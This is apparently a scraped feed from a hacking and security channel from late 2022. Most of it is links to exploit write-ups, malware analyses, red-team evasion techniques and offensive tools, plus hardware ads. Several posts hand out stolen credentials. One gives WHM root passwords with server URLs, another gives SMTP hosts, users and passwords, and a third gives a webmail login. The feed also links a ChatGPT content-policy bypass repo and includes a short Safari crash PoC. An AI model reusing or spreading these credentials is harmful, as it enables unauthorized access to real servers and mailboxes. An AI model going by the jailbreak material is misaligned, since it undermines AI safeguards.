Россияне в третьем квартале текущего года вывели в другие страны рекордные 1,47 трлн рублей. Это почти в три раза больше, чем в первом и втором кварталах, и в 26 раз больше, чем в третьем квартале 2021 года.Translation: ru-enIn the third quarter of this year, the Russians withdrew a record 1.47 trillion rubles to other countries. This is almost three times more than in the first and second quarters, and 26 times more than in the third quarter of 2021.
2022-12-29 15:30:52
https://youtu.be/eK3nz0QdFac
2022-12-29 11:37:02
Free WHM 🔟✔️root;KdiKQWsb;https://149.210.171.79:2087 | Domains: 14tegkocom;#))CW(TQntc5;https://tegko.com:2087 | Domains: 39root;T7w7f8sS;https://server.nicer9.com:2087 | Domains: 56root;G@briel8728;https://server.soybuho.net:2087 | Domains: 13meghahos;6C5@[NuY9kTu9t;https://meghahost.com:2087 | Domains: 14root;TrigonHost@12345A!;https://trigonhost.com:2087 | Domains: 28inovaho1;Ajf@56290270;https://inovahosting.com.br:2087 | Domains: 10starhost;LJ8fm[06tB1x*C;https://cloud.sabelhost.com:2087 | Domains: 8bdsp;J4p)Z=k(={c&;https://103-159-36-18.cprapid.com:2087 | Domains: 29root;oSDJ2pYiR2x1Pqcn;https://5124998.e-ducativo.org:2087 | Domains: 5root;1q2w3e4r5t!Q"W£E$R%T;https://nagoya-mansion.com:2087 | Domains: 7inovaho1;Ajf@56290270;https://svr.cluster03brasil.com:2087 | Domains: 10root;HnGpQrwHBs42v2;https://157-90-214-118.cprapid.com:2087 | Domains: 6root;tF1xO0cZ5pU0jA4w;https://212-68-45-35.cprapid.com:2087 | Domains: 3pointmakinacom;H^YN23zbeXX?;https://cp15.servername.co:2087 | Domains: 8inaciomecena;@Megatec2604;https://empreendedorweb.com.br:2087 | Domains: 8root;x(G+D%k#bn0dEA)0Pt;https://ns3077008.ip-147-135-222.eu:2087 | Domains: 18📣
2022-12-29 11:37:01
#𝑆𝑀𝑇𝑃𝑆 🟢🔥HOST : smtp.eu.mailgun.orgPORT : 587USER : postmaster@account.billada.comPASS : f792a046ee0b4ddd9312a7d2bbb8cef7-8845d1b1-dd279ceeHOST : premium157.web-hosting.comPORT : 587USER : noreply@bridgepro.caPASSW : qComPass@Romi7664SENDER : unknown@unknown.comHOST : mail.msofficeskill.comPORT : 587USER : info@msofficeskill.comPASSW : Prateek@1974SENDER : info@msofficeskill.comHOST : smtp.hostinger.comPORT : 587USER : support@ironpatches.netPASSW : Undisputed$1SENDER : support@ironpatches.netHOST : smtp.office365.comPORT : 587USER : mbl@myanmar-brewery.comPASS : P@ssw0rd2022@)@@HOST : srvc204.trwww.comPORT : 587USER : send@yazicitoner.com.trPASSW : Send0034!SENDER : send@yazicitoner.com.trHOST : smtp.hostinger.comPORT : 587USER : support@ironpatches.netPASSW : Undisputed$1SENDER : support@ironpatches.net
2022-12-28 16:20:03
#Research"A Survey of the Recent Trends in Deep Learning Based Malware Detection", 2022.
2022-12-28 16:20:02
#reversingL’art de l’évasion: How Shlayer hides its configuration inside Apple proprietary DMG fileshttps://objective-see.org/blog/blog_0x70.html
2022-12-28 16:20:01
#Malware_analysis1. BlueNoroff introduces new methods bypassing MoTWhttps://securelist.com/bluenoroff-methods-bypass-motw/1083832. GuLoader Dissection Reveals New Anti-Analysis Techniques and Code Injection Redundancyhttps://www.crowdstrike.com/blog/guloader-dissection-reveals-new-anti-analysis-techniques-and-code-injection-redundancy
2022-12-28 16:20:00
#tools#Offensive_securitySteganography Toolkithttps://github.com/DominicBreuker/stego-toolkit
2022-12-28 16:19:59
#tools#reversing1. OFRAK (Open Firmware Reverse Analysis Konsole) - binary analysis and modification platformhttps://github.com/redballoonsecurity/ofrak2. A free comprehensive reverse engineering tutorial covering x86, x64, 32-bit ARM & 64-bit ARM architectureshttps://github.com/mytechnotalent/Reverse-Engineering
2022-12-28 16:19:58
#Offensive_securityModifying Embedded Filesystems in ARM Linux zImageshttps://jamchamb.net/2022/01/02/modify-vmlinuz-arm.html
2022-12-28 16:19:57
#Red_Team_Tactics1. Divide And Bypass: A new Simple Way to Bypass AMSIhttps://x4sh3s.github.io/posts/Divide-and-bypass-amsi2. Pass-the-Challenge: Defeating Windows Defender Credential Guardhttps://research.ifcr.dk/pass-the-challenge-defeating-windows-defender-credential-guard-31a892eee22
2022-12-28 16:19:56
#exploitKITCTFCTF 2022 V8 Heap Sandbox Escapehttps://ju256.de/posts/kitctfctf22-date]-> PoC: https://github.com/ju256/kitctfctf22-solutions/blob/main/date/expl.js
2022-12-28 16:19:55
#tools#Blue_Team_Techniques 1. Potential Cloud Account Takeoverhttps://github.com/Cyb3r-Monk/Threat-Hunting-and-Detection/blob/main/Credential%20Access/Potential%20Cloud%20Account%20Takeover.md2. Kernel-mode WinDbg extension for Protected Process investigationhttps://github.com/daem0nc0re/TangledWinExec/tree/main/ProtectedProcess#ppeditor
2022-12-28 14:33:15
https://youtu.be/XM2oxnXWmxY
2022-12-28 14:00:42
Certificate Ripper v2 released - tool to extract server certificateshttps://ift.tt/1Yr83PxSubmitted December 28, 2022 at 06:24AM by Hakky54via reddit https://ift.tt/S8YAlmQ
2022-12-28 14:00:41
Spice up your persistence: loading PHP extensions from memoryhttps://ift.tt/EoF3gDjSubmitted December 28, 2022 at 03:25AM by gid0rahvia reddit https://ift.tt/gA8Zb91
2022-12-27 17:08:21
​​DSTIKE WiFI Deauther MiNiDeauther MiNi is still an ESP8266 development board,It comes installed with the latest ESP8266 Deauther software. With this software, you can perform different attacks to test WiFi networks. Please note that the ESP8266 does only support 2.4GHz.You can also use it to develop your own software. It is simple to use, just like any other ESP8266 development board.Function:▫️ Deauther Attack: Disconnect 2.4G WiFi▫️ Deauther Beacon: Create fake networks▫️ Deauther Probe:Confuse wifi trackers▫️ Packet Monitor:Display wifi trafficDeauther or Jammer: What's the difference?Buy online: 🛒 https://ali.ski/PItT3#wifi #dstike #esp8266
2022-12-27 14:57:04
https://youtu.be/rjXq_AgfwAA
2022-12-26 14:29:19
🔥🔥🔥Cinema time!Agenda:💾Video decoding subsystem overview💾AppleAVD internals💾AppleAVD attack surface💾Fuzzing approach and code analysis💾Results💾Previously disclosed vulnerabilities and exploitation💾Discussion💾Q&A
2022-12-26 14:28:43
🔥🔥🔥KITCTFCTF 2022 V8 Heap SBX(V8 exploitation challenge)In this writeup, I’ll go over the intended solution in detail which leads to a V8 (heap) sandbox escape without using the JIT technique that is very popular currently.
2022-12-26 14:28:39
💥Introduction to the Windows Filtering PlatformThe Windows Filtering Platform (WFP) provides flexible ways to control network filtering. It exposes user-mode and kernel-mode APIs, that interact with several layers of the networking stack. Some configuration and control is available directly from user-mode, without requiring any kernel-mode code (although it does require administrator-level access). WFP replaces older network filtering technologies, such as Transport Driver Interface (TDI) filters some types of NDIS filters.
2022-12-26 14:28:33
🔥🔥🔥AD manager Plus full RCE PoC At that time, Log4j was already widespread on the internet. Manage Engine had already patched the Ad Manager Plus to prevent it from being affected by the Log4j vulnerability. They had mentioned that Log4j was not affected by Ad Manager Plus. However, we determined that the Ad Manager Plus was running on our target and managed to exploit the Log4j vulnerability.When we initially reported this vulnerability to Synack, we only managed to get a DNS callback and our report was marked as LDAP injection. However, we attempted to gain full RCE on the host but were not successful. Later, we discovered that Ad Manager Plus was running on another target, so we tried to get full RCE on that target. We realized that there was a firewall and an anti-virus running on the machine, so most of our payloads wouldn't work. After spending a considerable amount of time , we eventually managed to bypass the firewall and anti-virus, and achieve full RCE.
2022-12-26 14:28:26
|The Apocalypse of the Heap - Shizo edit.|💥Painless intro to the Linux userland heapThe heap is hard to maintain, especially in this implementation due to being threaded. Hopefully this article helps you understand the process of making a chunk free from its allocation and which structures play in the game of freeing chunks.💥Understanding glibc malloc💾How heap memory is obtained from kernel?💾How efficiently memory is managed?💾Is it managed by kernel or by library or by application itself?💾Can heap memory be exploited?💥ptmalloc fanzine episodes(collection of resources related to glibc heap meta-data corruptions):💾episode 01: munmap madness💾episode 02: fastbin fever💾episode 03: scraps of notes on ptmalloc metadata corruptions💾episode 04: once upon a realloc()💾episode 05: thread local caching in glibc malloc💥Heap exploitation for Dummies.This short book is written for people who want to understand the internals of 'heap memory', particularly the implementation of glibc's 'malloc' and 'free' procedures, and also for security researchers who want to get started in the field of heap exploitation.🔖github repo💥Educational Heap Exploitation(how2heap) is for learning various heap exploitation techniques. We use Ubuntu's Libc releases as the gold-standard. Each technique is verified to work on corresponding Ubuntu releases.💥GlibC Malloc for Exploiters presentation💥Linux Heap Exploitation Intro Series:💾printf might be leaking!💾Used and Abused – Use After Free 💾The magicians cape – 1 Byte Overflow 💾Riding free on the heap – Double free attacks! 💾Set you free() – part 1 💾Set you free() – part 2 💥How to exploit a double free vulnerability in 2021(Exploiting an ARM-only race condition)You will learn how to exploit a double free vulnerability or exploit a UAF vulnerability.💥Linux kernel heap feng shui in 2022In this article we discuss changes in the Linux kernel slab allocator implementation and exploitation challenges associated with kernel heap-related vulnerabilities. We focus on the SLUB (unqueued slab allocator) implementation in this article since it is the most common allocator enabled by default on most Linux distributions and Android devices.💥Overview of GLIBC heap exploitation techniquesOverview of current GLIBC heap exploitation techniques up to GLIBC 2.34, including their ideas and introduced mitigations along the way.💥Perfect Spray: A Journey From Finding a New Type of Logical Flaw at Linux Kernel To Developing a New Heap Exploitation TechniqueIn this talk, we will present Pspray, a new memory exploitation technique for the Linux kernel, dramatically improving the exploitation reliability. In particular, we designed a heap exploitation technique effective for most memory vulnerabilities, including heap OOB, UAF, and double-free. The key idea behind this new attack is in developing timing side-channels in Linux's SLUB allocator. Then using this timing side-channel, we carefully redesigned the traditional exploitation technique to precisely predict the runtime behavior of SLUB, allowing Pspray to avoid unexpected exploitation failure. We used Pspray's exploitation technique for 10 real-world Linux kernel vulnerabilities, which significantly improved the attack success probability from 56.1% to 97.92%.
2022-12-26 14:28:22
⬇️Ниже приведен короткий список материалов, который мне помог в изучении эксплуатации кучи.⬇️⬇️Below is a short list of materials that helped me in studying the heap exploitation ⬇️
2022-12-26 14:13:25
https://youtu.be/Xokf2gpR8kk
2022-12-26 05:05:46
​​dnscrypt-proxyA flexible DNS proxy, with support for modern encrypted DNS protocols such as DNSCrypt v2, DNS-over-HTTPS, Anonymized DNSCrypt and ODoH (Oblivious DoH).▫️ dnscrypt-proxy documentation ← Start here▫️ DNSCrypt project home page▫️ Discussions▫️ DNS-over-HTTPS and DNSCrypt resolvers▫️ Server and client implementations▫️ DNS stamps▫️ FAQhttps://github.com/DNSCrypt/dnscrypt-proxy#DNS #privacy
2022-12-26 05:05:45
Overview of Glibc Heap Exploitation Techniques (currently up to v2.34)https://ift.tt/dnPVLZcSubmitted December 25, 2022 at 10:17AM by himeko98via reddit https://ift.tt/YqBW6Sz
2022-12-25 15:35:37
Hello everyone in this auspicious day we are going to launch our Forum powered by @H4ckerinthehouse where you can connect, share and communicate with each others. Here are some features of this forum:You can ask questions, create polls, answer to any question. You can refer to anyone using your refferal code. You can make a public discussion group as well as a private discussion group! Also you can send a private message to an individual and you can ask anything. A lot of upcoming features and surprises are coming in upcoming days.So what you guys are looking for? Go and register on the Hackerinthehouse Forum. Here is the link of the forum to register: https://forum.hackerinthehouse.in
2022-12-25 14:04:03
https://youtu.be/ED_I9JhGhAc
2022-12-25 01:44:59
Happy Tulsi Pujan ❤️
2022-12-24 16:39:20
#reversingReverse Engineering Tiktok's VM Obfuscationhttps://nullpt.rs/reverse-engineering-tiktok-vm-1
2022-12-24 16:39:19
#Malware_analysis1. Zerobot Malwarehttps://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities2. IcedID Botnet Distributors Abuse Google PPC to Distribute Malwarehttps://www.trendmicro.com/en_us/research/22/l/icedid-botnet-distributors-abuse-google-ppc-to-distribute-malware.html
2022-12-24 16:39:18
#Blue_Team_Techniques1. Linux kernel module generator for Hidden firewall that follows the rules in the external YAML filehttps://github.com/CoolerVoid/HiddenWall2. Guide to Use Sigma EVTX Checkerhttps://gist.github.com/Neo23x0/9eb505a00f7ba591645a6246fa6c5246// Fast go-based scanner for Linux, Windows, macOS that applies Sigma rules and outputs the matches as JSON
2022-12-24 16:39:17
#exploit1. CVE-2020-9854:"Unauthd" - three logic bugs ftwhttps://objective-see.org/blog/blog_0x4D.html2. CVE-2022-3875, CVE-2022-3876, CVE-2022-3877:Vulnerabilities in Passwordstatehttps://www.modzero.com/modlog/archives/2022/12/19/better_make_sure_your_password_manager_is_secure/index.html
2022-12-24 16:39:16
#tools#Offensive_security1. Rps_Http ClientInfo IOC search PowerShell script for recent Exchange issue to check for signs of exploitationhttps://github.com/CrowdStrike/OWASSRF/blob/main/Rps_Http-IOC.ps12. Vultriever - Vulnerability scoring with Nmap with the built-in Vulners snap-inhttps://github.com/MalwareHunters/vultriever
2022-12-24 16:39:15
#Threat_Research1. Custom-Branded Ransomware: The Vice Society Group and the Threat of Outsourced Developmenthttps://www.sentinelone.com/labs/custom-branded-ransomware-the-vice-society-group-and-the-threat-of-outsourced-development2. New Ransomware Strains Emerging From Leaked Conti’s Source Codehttps://blog.cyble.com/2022/12/22/new-ransomware-strains-emerging-from-leaked-contis-source-code
2022-12-24 16:38:17
🔥🔥🔥PoC of wfshbr64.sys LPE(Windows Kernel Mode Anti-Cheat Driver, CVE-2022-42046)wfshbr64.sys and wfshbr32.sys specially crafted payload allows arbitrary user to perform bitwise operation with arbitrary EPROCESS offset and flags value to purposely elevate the game process to CodeGen Full protection by manipulating EPROCESS.Protection and EPROCESS.SignatureLevel flags (security hole as a feature).⚠️The driver is signed by Microsoft hardware compatibility publisher that is submitted via Microsoft Hardware Program.
2022-12-24 16:38:16
🔥🔥🔥Blindside is a technique for evading the monitoring of EDR and XDR platforms using hardware breakpoints to inject commands and perform unexpected, unwanted, or malicious operations. It involves creating a breakpoint handler, and setting a hardware breakpoint that will force the debugged process to load only ntdll to memory. This will result in a clean and unhooked ntdll which then could be copied to our process and unhook the original ntdll.🔖Technical blog post:Blindside: A New Technique for EDR Evasion with Hardware Breakpoints
2022-12-24 16:38:15
💥Reverse Engineering Tiktok's VM Obfuscation (Part 1)This article does not delve into the specifics of how these strings are utilized or how TikTok interprets the rest of the bytecode through its custom virtual machine and various opcodes. If that is something you are interested in, keep an eye out for the second part of this series.🔖Full strings dump
2022-12-24 16:12:27
https://youtu.be/s03YxiRxyWY
2022-12-24 10:30:35
https://learningcorner.pk/
2022-12-24 10:11:58
https://www.nrmtechnologygroup.com.pk/
2022-12-24 09:59:36
»»»» https://webmail.cyber.net.pk:8443/login_up.php ««««UserName: tac-userPassword: ~D4p5o8s
2022-12-23 14:56:02
Hello, my rabbits who like to go to tea parties 🐰☕️While I am writing about bitcoin nodes search and analysis, I decided to make a collection of rootkit malware on linux🐧Reverse💊Not really about linux, but still a very cool guide to reverse ; Article about reverse-engineering the Ebpfkit rootkit ;Article about dovecat and hy4 malware analysis for Linux ;A collection of resources for reverse-engineering Linux ; Article about virus analysis aromatization on linux ;Article about malware analysis for Linux ;Article about rootkit and its detection ;Resources🗝A site with material on viruses and rootkits on linux, including their writing ; A site with resources on reversal ; A resource site for people who want to write viruses for linux ;A site with excellent material and documents about linux malware ;Examples of malware 🦠A github thread with cool virus repositories ;Linux X86_64 ELF virus ;A simple linux virus. It can get root rights and destroy your system ;Linux ransomware ;Repository of the source code of various Linux malware ;Combination of shell and rootkit ;Collection of Linux rootkits ; A simple Linux kernel rootkit ;MateriaLs / Collections📖A collection of linux virus materials ;A collection of materiałs on rootkits and attacks on linux ;Article about evading malware analysis by reverse engineering ;Malware analysis methodology in Linux environment ;An article for understanding Linux malware ;Not a bad article about writing rootkits on linux ;Malware Scanners 🧲LMD malware scanner for Linux ;Linux rootkit scanner ;A github thread with collections of Linux rootkit scanners ;Also a good rootkit scanner ;As you can see, although it is widely accepted that "writing viruses on linux is difficult, or even impossible practice", it is far from it, and that you have linux is not yet a silver bullet against viruses On linux, viruses (especially rootkits) are written and very successfullySo take care and protect your systemThank you for reading ❤️And Alice, don't forget to read the sign on the back of the bottle you want to drink, in case it says "poison"🧪🎀#malware #virus #revers #ransomware #attacks #linux #exploit #rootkit
2022-12-23 14:52:41
🔥🔥🔥The GOAD’s writeups series end with this part. 💥GOAD - part 12 - TrustsThis post will be on escalation with domain trust (from child to parent domain) and on Forest to Forest trust lateral move.
2022-12-23 14:33:14
https://youtu.be/6peB953Fr6A
2022-12-22 16:05:24
​​Hacking & Cybersecurity class materialsWe are delighted to announce a first on Lawfare: A live online class on hacking and cybersecurity.https://github.com/lawfareblog/hacking-cybersecurity
2022-12-22 16:05:23
​​USB NinjaUSB Ninja is an information security and penetration testing tool that looks and functions just like a regular USB cable (both power and data) until a wireless remote control triggers it to deliver your choice of attack payload to the host machine. In essence, USB Ninja is the next step in the evolution of BadUSB, embedding the attack in the USB cable itself.Emulating keyboard and mouse actions, payloads can be completely customized and can be highly targeted. Undetectable by firewalls, AV software (depending on payload of course) or visual inspection, the USB Ninja is an ideal tool for penetration testers, police and government.Wireless trigger device for the USB Ninja. Can trigger two different payloads via toggle buttons. Accepts RP-SMA antennas if you want greater distances for remote payload triggering. Documentation:https://usbninja.com/help/Buy online:🛒 Cable https://ali.ski/IjDEv4🛒 Bluetooth Remote https://ali.ski/aVNHh#usb #badusb #cable
2022-12-22 16:02:36
​​Golden NuggetsBurp Suite Extension to easily create Wordlists based off URI, URI Parameters and Single Words (Minus the Domain)https://github.com/GainSec/GoldenNuggets-1
2022-12-22 16:02:35
​​MSI ShenanigansThis repository contains Proof of Concept code and harmless weaponised packages representing various weaponisation strategies that Threat Actors abuse in Windows Installer MSI format. https://github.com/mgeeky/msi-shenanigansMSI Shenanigans. Part 1 – Offensive Capabilities Overview:https://mgeeky.tech/msi-shenanigans-part-1/
2022-12-22 16:02:34
​​plutionPrototype pollution scanner using headless chromehttps://github.com/raverrr/plution
2022-12-22 16:01:37
​​SquarePhishSquarePhish is an advanced phishing tool that uses a technique combining the OAuth Device code authentication flow and QR codes.https://github.com/secureworks/squarephish
2022-12-22 16:01:36
​​Copilot, for your terminalA CLI tool that generates shell scripts from a human readable description.https://github.com/m1guelpf/plz-cli
2022-12-22 14:38:34
​​chatgpt_chinese_prompt_hackUse prompt hack to bypass OpenAI's content policy restrictions by golfzerthttps://github.com/golfzert/chatgpt-chinese-prompt-hack
2022-12-22 14:09:01
https://youtu.be/iazd1qH9CT8
2022-12-22 05:51:16
#exploit1. CVE-2022-48870:maccms admin+ xss attackshttps://github.com/Cedric1314/CVE-2022-488702. CVE-2022-39253:Docker host file readhttps://github.com/ssst0n3/docker-cve-2022-39253-poc
2022-12-22 05:51:15
#WebApp_SecurityWeb Attack Cheat Sheethttps://github.com/riramar/Web-Attack-Cheat-Sheet
2022-12-22 05:51:14
#Offensive_securityDumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk, plus functions and strings obfuscation, duplicate lsass handle from existed processeshttps://github.com/D1rkMtr/DumpThatLSASS
2022-12-21 17:24:04
https://github.com/youhacker55/Bind_Shell
2022-12-21 15:28:02
#exploit1. CVE-2022-47518, CVE-2022-47519, CVE-2022-47520, CVE-2022-47521:Remote DoS in Linux kernel WILC1000 wireless driverhttps://securitylab.github.com/advisories/GHSL-2022-112_GHSL-2022-115_wilc10002. CVE-2022-2602:io_uring kernel exploithttps://github.com/kiks7/CVE-2022-2602-Kernel-Exploit3. Directory Traversal Vulnerability in Huawei HG255s Productshttps://infosecwriteups.com/directory-ttraversal-vulnerability-in-huawei-hg255s-products-dce941a1d015
2022-12-21 15:28:01
#Threat_Research#Cloud_Security1. Linux Kernel: Exploiting a Netfilter Use-after-Free in kmalloc-cghttps://blog.exodusintel.com/2022/12/19/linux-kernel-exploiting-a-netfilter-use-after-free-in-kmalloc-cg2. Elastic IP Hijacking - A New Attack Vector in AWShttps://www.mitiga.io/blog/elastic-ip-hijacking-a-new-attack-vector-in-aws
2022-12-21 15:27:46
#Blue_Team_TechniquesIncident Response Methodologies 2022https://github.com/certsocietegenerale/IRM// EN/ES/FR/RU Versions
2022-12-21 15:27:45
#AnalyticsTop 10 most exploited vulnerabilities in 20221. CVE-2022-30190: MS Office "Follina"2. CVE-2021-44228: Apache Log4Shell3. CVE-2022-22965: Spring4Shell4. CVE-2022-1388: F5 BIG-IP5. CVE-2022-0609: Google Chrome zero-dayhttps://blog.google/threat-analysis-group/countering-threats-north-korea6. CVE-2017-11882: Old but not forgotten - MS Office bug7. CVE-2022-41082, CVE-2022-41040: ProxyNotShell8. CVE-2022-27925, CVE-2022-41352: Zimbra Collaboration Suite bugs9. CVE-2022-26134: Atlassian Confluence RCE flaw 10. CVE-2022-30525: Zyxel RCE vulnerability
2022-12-21 14:46:53
https://youtu.be/NxfuElhRS2Q
2022-12-21 13:45:30
💥OWASSRF: CrowdStrike Identifies New Exploit Method for Exchange Bypassing ProxyNotShell MitigationsCrowdStrike recently discovered a new exploit method (called OWASSRF) consisting of CVE-2022-41080 and CVE-2022-41082 to achieve remote code execution (RCE) through Outlook Web Access (OWA). The new exploit method bypasses URL rewrite mitigations for the Autodiscover endpoint provided by Microsoft in response to ProxyNotShell.After initial access via this new exploit method, the threat actor leveraged legitimate Plink and AnyDesk executables to maintain access, and performed anti-forensics techniques on the Microsoft Exchange server in an attempt to hide their activity.
2022-12-21 13:45:29
💥Home Grown Red Team: Let’s Make Some Malware In C: Part 3This post is going to be all about the dll!
2022-12-21 13:45:25
🔥CVE-2022-2602 Exploit using inode locking technique.📕DirtyCred: Escalating Privilege in Linux Kernel🔖Blog posts: DirtyCred Remastered: how to turn an UAF into Privilege EscalationCVE-2022-2602: DirtyCred File Exploitation applied on an io_uring UAF
2022-12-21 13:45:15
|CVE-2022-2602 Kernel Exploit|🔥The vulnerability is an UAF that impacts the registered file descriptor functionality in the io_uring subsystem. It's possible to register a file in the io_uring context, free it from the Unix Garbage Collector(GC) and re-use it with the requested io_uring operation (for example, a writev operation). To exploit the bug, it was a matter of replace the freed file structure with a read-only file (e.g. /etc/passwd), in order to write into it, and achieve a good timing with a small race window.
2022-12-21 13:45:14
🔥Deconstructing and Exploiting CVE-2020-6418 (exploit here)This vulnerability lies in the V8 engine of Google Chrome, namely its optimizing compiler Turbofan. Specifically, the vulnerable version is in Google Chrome’s V8 prior to 80.0.3987.122. In this article, Daniel Toh Jing En will give a step-by-step analysis of the vulnerability, from the root cause to exploitation.
2022-12-21 13:45:12
|FORCEDENTRY, ты тут?|🕵️‍♂️Думаю, что многие не забыли про сделавший много шума год назад data-only 0-click RCE сплойт FORCEDENTRY(CVE-2021-30860, integer overflow в JBIG2 реализации для xpdf в Apple (JBIG2Stream::readTextRegionSeg(), посредством программирования JBIG2 weird machine в парсере), что относится к CoreGraphics по сути) через iMessage от NSO Group. То есть прилетает тебе PDF файл, который якобы ".gif" и за счет того, что IMTranscoderAgent анализировал как раз такого рода самозванцев за пределами BlastDoor песочницы, израильтяне могли достичь SBX. В действительности эксплуатация была намного сложнее и можно почитать подробнее: на канале, тут и тут.Причем исследователи из Google Project Zero не смогли установить точный след после IMTranscoderAgent SBX и как предположение выдвинули несколько сценариев эксплуатации:1️⃣iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ iOS kernel LPE2️⃣iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ some_service ➡️ iOS kernel LPEПроблема для безопасников и по сей день стоит в том, что в публичном доступе до сих пор нет сэмплов(отсюда можем сделать вывод, что стандартными методами детектить не выйдет). В этом посте Мэтта помимо разбора атаки идет речь и о детектировании без испльзования регулярок или проверок имени процесса, в конечном итоге был представлен инструмент(ELEGANTBOUNCER) для анализа файлов non-fileless(data-only) атаки, причем не основываясь на сэмплах. 🔖Более подробно можно почитать в статье Мэтта.🕵️‍♂️I think that many have not forgotten about the FORCEDENTRY exploit that made a lot of noise a year ago (CVE-2021-30860, integer overflow in the JBIG2 implementation for xpdf in Apple (JBIG2Stream::readTextRegionSeg(), by programming the JBIG2 weird machine in the parser), which refers to CoreGraphics in fact) via iMessage from NSO Group. That is, a PDF file arrives to you, which is allegedly ".gif" and due to the fact that IMTranscoderAgent analyzed just such impostors outside the BlastDoor sandbox, the Israelis could achieve SBX. In fact, the operation was much more complicated and you can read more: a on the channel, here and here.Moreover, researchers from Google Project Zero were unable to establish an exact trace after IMTranscoderAgent SBX and, as an assumption, put forward several operating scenarios:1️⃣iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ iOS kernel LPE2️⃣iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ some_service ➡️ iOS kernel LPEThe problem for security guards to this day is that there are still no samples in the public domain (from here we can conclude that it will not be possible to detect using standard methods). In this post by Matt, in addition to analyzing the attack, we are talking about detecting without using regular expressions or checking the process name, eventually a tool for analyzing non-fileless(data-only) attack files was introduced, and not based on samples(ELEGANTBOUNCER). 🔖You can read more in Matt's article.#NSO #PegasusSpyware #FORCEDENTRY #iOS #iMessage #forensics #security #expoitation #sbx #xpdf #weirdMachine #JBIG2
2022-12-21 13:44:10
💥In-Memory Execution in macOS: the Old and the NewAs part of our work, it’s often interesting to try to find possible avenues of attack that bypass detections on EDR products. On macOS, EDR products specifically collect telemetry from fork and exec syscalls. macOS has alternative ways of executing code, which side-step these system calls by executing code directly in-memory.In this writeup, we touch on all 3 aforementioned APIs and then create a PoC loader which uses NSCreateObjectFileImageFromFile and CFBundleCreate to load a bundle from disk and execute it.
2022-12-20 14:41:31
https://youtu.be/6lrW4FGLah8
2022-12-20 07:07:12
https://buyamazon.pk/
2022-12-20 06:47:15
https://levelupsystem.pk/
2022-12-20 06:32:26
https://pcrs.com.pk/
2022-12-20 05:02:57
🔥Linux Kernel: Exploiting a Netfilter UAF in kmalloc-cgWe describe a method to exploit a UAF in the Linux kernel when objects are allocated in a specific slab cache, namely the kmalloc-cg series of SLUB caches used for cgroups. This vulnerability is assigned CVE-2022-32250 and exists in Linux kernel versions 5.18.1 and prior.
2022-12-20 05:02:33
🔥🔥🔥Type confusion vulnerability(CVE-2022-42823) exists in the Apple Safari JSC Inspector(Root Cause Analysis + PoC).A Type confusion vulnerability exists in the Apple Safari JSC Inspector. This issue causes Memory Corruption due to Type confusion. A victim must open an arbitrary generated HTML file to trigger this vulnerability.PoC:<script> let object = {}; Object.prototype.__defineSetter__('type', function() { object.x = {}; object[0] = object.x; });</script>🛡Fixed in: macOS 13, tvOS 16.1, iOS 16.1 & iPadOS 16, Safari 16.1, watchOS 9.1.
2022-12-20 04:54:25
​​ZoneAlarmEoPExploit for Arbitrary File Move vulnerability in ZoneAlarm AVhttps://github.com/Wh04m1001/ZoneAlarmEoP
2022-12-20 03:11:03
#Red_Team_Tactics1. Blindside: A New Technique for EDR Evasion with Hardware Breakpointshttps://cymulate.com/blog/blindside-a-new-technique-for-edr-evasion-with-hardware-breakpoints2. Raw sockets hackinghttps://antonio-cooler.gitbook.io/coolervoid-tavern/port-knocking-from-the-scratch]-> Secure shell using port Knocking technique with AES256-GCM: https://github.com/CoolerVoid/ninja_shell
2022-12-20 03:11:02
#tools#Offensive_security1. Shennina - Automating Host Exploitation with AIhttps://github.com/mazen160/shennina2. AMSI-bypass obfuscation + ETW-block obfuscation + powershell command obfuscationhttps://github.com/H4de5-7/powershell-obfuscation
2022-12-20 03:11:01
#Infographics"VT Intelligence Cheat Sheet", 2022.
2022-12-20 03:10:59
#Analytics#Malware_analysis1. Ransomware Business Models: Future Pivots and Trendshttps://www.trendmicro.com/en_us/research/22/l/ransomware-business-models-future-trends.html2. SentinelSneak: Malicious PyPI module poses as security software development kithttps://blog.reversinglabs.com/blog/sentinelsneak-malicious-pypi-module-poses-as-security-sdk
2022-12-19 17:58:10
Heartbleed vulnerability exploited🩸▪️https://github.com/Saiprasad16/Heartbleed#hackgit #github #soft #Heartbleed
2022-12-19 17:58:09
CrimeFlare - This tool can help you to see the real IP behind CloudFlare protected websites.https://github.com/zidansec/CrimeFlare
2022-12-19 17:56:52
🟥10k🔠 non stop Post uploading soon this Last month Happy💻 cyber security intelligent 💻
2022-12-19 17:37:56
https://github.com/shanelawrence/cve_manager_VS
2022-12-19 17:37:55
https://github.com/dmarakom6/shellnotes
2022-12-19 17:37:54
https://github.com/hausec/ProxyLogon
2022-12-19 17:32:03
Wi-Fi SurveyorVisualize Wi-Fi signal strength over a geographic area.https://github.com/ecoAPM/WiFiSurveyor
2022-12-19 17:20:19
#Threat_ResearchEntryBleed: Breaking KASLR under KPTI with Prefetch (CVE-2022-4543)https://www.willsroot.io/2022/12/entrybleed.html]-> https://seclists.org/oss-sec/2022/q4/198
2022-12-19 16:35:24
|Exploit Notes|📑Exploit Notes github repoSticky notes for pentesting. Search hacking techniques and tools for penetration testings, bug bounty, CTF.💾File Upload Attack💾Java Pentesting💾RE with Rizin💾Android Pentesting💾Pug Pentesting💾PE Analysis💾RE💾IMINT and GEOINT💾32-bit ARM Assembly💾OSINT💾x86 Assembly💾Malware Analysis💾BOF Attack
2022-12-19 16:35:03
🔥🔥🔥MeshyJSON: A TP-Link tdpServer JSON Stack OverflowThis blog post describes a vulnerability found and exploited in November 2022 by NCC Group. The target was the TP-Link AX1800 WiFi 6 Router (Archer AX21). It was running hardware version 3.6 and firmware version 1.1.1 (Archer AX21(US)_V3.6_1.1.1 Build 20220603). The vulnerability was patched on 2nd of December 2022 with firmware version 1.1.3 (Archer AX21(US)_V3.6_1.1.3 Build 20221125).
2022-12-19 16:34:34
|Offensive Security Cheatsheet|Document used to centralize many informations about cybersecurity techniques and payloads.💾OSINT💾Web Pentest💾Network💾Shells methods💾Windows Systems💾Linux Systems💾Other Systems💾Passcracking Hash & Files💾Phishing, RedTeam and SE💾Wireless💾Cryptography💾Pwn💾Defensive, Monitoring, CTI...💾External Resources
2022-12-19 16:33:24
